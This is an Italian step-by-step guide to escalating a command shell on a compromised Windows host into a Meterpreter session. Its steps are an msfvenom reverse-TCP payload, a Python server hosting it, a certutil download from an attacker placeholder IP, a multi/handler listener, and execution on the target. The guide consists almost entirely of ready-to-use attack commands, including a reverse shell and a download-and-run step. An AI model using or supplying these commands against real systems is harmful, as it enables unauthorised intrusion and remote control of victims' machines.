Msfvenom

Guida Operativa alla Post-Exploitation con Metasploit Framework

Premessa

A seguito dell'acquisizione di una shell di comando su un target compromesso, è spesso preferibile elevare il livello di controllo ottenendo una sessione _Meterpreter_. Questa guida fornisce un processo metodico e professionale per effettuare tale escalation utilizzando strumenti standard come _msfvenom_, _certutil_ e il modulo handler di _Metasploit Framework_.

Procedura Operativa

1. Creazione di un Payload Meterpreter

Utilizzare _msfvenom_ per generare un payload che stabilisca una connessione inversa (_reverse TCP_) al proprio sistema:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP_ATTACCANTE> LPORT=<PORTA> -f exe > payload.exe

Nota: Sostituire con l'indirizzo IP del proprio sistema e con una porta libera da utilizzare per la connessione.

2. Avvio di un Web Server per la Distribuzione del Payload

Per consentire al target di scaricare il payload, avviare un semplice web server Python nella directory contenente il file payload.exe:

python3 -m http.server 8000

3. Scaricare il Payload dalla Macchina Target

Dalla shell remota ottenuta sul target, utilizzare certutil per scaricare il payload:

certutil -urlcache -f http://<IP_ATTACCANTE>:8000/payload.exe payload.exe

Nota: certutil è nativamente presente sui sistemi Windows e viene spesso utilizzato in attività di post-exploitation per il trasferimento file.

4. Configurazione dell'Handler in Metasploit

Nel framework Metasploit, configurare un handler per ricevere la connessione:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <IP_ATTACCANTE>
set LPORT <PORTA>
run -j -z

• -j: esegue l'handler come job in background.

• -z: non interagisce automaticamente con la sessione ricevuta.

5. Esecuzione del Payload sulla Macchina Target

Tornare alla shell remota e avviare il payload scaricato:

payload.exe

A questo punto, la connessione inversa verrà stabilita e una sessione _Meterpreter_ sarà disponibile nella console di Metasploit.